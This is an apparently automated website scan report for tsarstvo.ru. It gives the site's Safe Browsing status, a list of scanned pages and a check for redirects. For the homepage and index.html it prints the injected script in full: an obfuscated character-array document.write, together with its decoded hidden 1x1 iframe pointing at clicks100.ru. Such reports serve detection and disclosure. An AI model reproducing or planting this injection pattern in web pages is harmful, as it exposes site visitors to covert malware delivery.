Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tsarstvo.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tsarstvo.ru/ | 200 OK Content-Length: 26237 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) a=new Array('<','i','f','r','a','m','e',' ','s','r','c','=','"','h','t','t','p',':','/','/','c','l','i','c','k','s','1','0','0','.','r','u','/','t','o','p','1','0','0','/','i','f','r','a','m','e','.','p','h','p','"',' ','w','i','d','t','h','=','1',' ','h','e','i','g','h','t','=','1',' ','s','t','y','l','e','=','"','v','i','s','i','b','i','l','i','t','y',':',' ','h','i','d','d','e','n','"','>','<','/','i','f','r','a','m','e','>');document.write(a.join('')) Decoded script: <iframe src="http://clicks100.ru/top100/iframe.php" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
| ||
http://tsarstvo.ru/index.html | 200 OK Content-Length: 26237 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) a=new Array('<','i','f','r','a','m','e',' ','s','r','c','=','"','h','t','t','p',':','/','/','c','l','i','c','k','s','1','0','0','.','r','u','/','t','o','p','1','0','0','/','i','f','r','a','m','e','.','p','h','p','"',' ','w','i','d','t','h','=','1',' ','h','e','i','g','h','t','=','1',' ','s','t','y','l','e','=','"','v','i','s','i','b','i','l','i','t','y',':',' ','h','i','d','d','e','n','"','>','<','/','i','f','r','a','m','e','>');document.write(a.join('')) Decoded script: <iframe src="http://clicks100.ru/top100/iframe.php" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
| ||
http://tsarstvo.ru/music/c-m-01.html | 200 OK Content-Length: 10666 Content-Type: text/html | clean |
http://tsarstvo.ru/music/accompanement/01.html | 200 OK Content-Length: 749 Content-Type: text/html | clean |
http://tsarstvo.ru/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 09 Jan 2015 02:16:35 GMT Server: Apache/1.3.42 (Unix) PHP/5.2.17 Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://tsarstvo.ru/links.html | 200 OK Content-Length: 7407 Content-Type: text/html | clean |
http://tsarstvo.ru/music/c-m-02.html | 200 OK Content-Length: 10650 Content-Type: text/html | clean |
http://tsarstvo.ru/music/c-m-03.html | 200 OK Content-Length: 10550 Content-Type: text/html | clean |
http://tsarstvo.ru/music/accompanement/15.html | 200 OK Content-Length: 749 Content-Type: text/html | clean |
http://tsarstvo.ru/music/c-m-04.html | 200 OK Content-Length: 10878 Content-Type: text/html | clean |
http://tsarstvo.ru/music/accompanement/04.html | 200 OK Content-Length: 749 Content-Type: text/html | clean |
http://tsarstvo.ru/music/accompanement/02.html | 200 OK Content-Length: 749 Content-Type: text/html | clean |
http://tsarstvo.ru/music/c-m-05.html | 200 OK Content-Length: 11070 Content-Type: text/html | clean |
http://tsarstvo.ru/music/accompanement/14.html | 200 OK Content-Length: 749 Content-Type: text/html | clean |
http://tsarstvo.ru/music/c-m-06.html | 200 OK Content-Length: 10051 Content-Type: text/html | clean |
http://tsarstvo.ru/music/accompanement/11.html | 200 OK Content-Length: 749 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tsarstvo.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 02:16:34 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: tsarstvo.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 02:16:34 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: tsarstvo.ru
Referer: http://www.google.com/search?q=tsarstvo.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tsarstvo.ru
Referer: http://www.google.com/search?q=tsarstvo.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.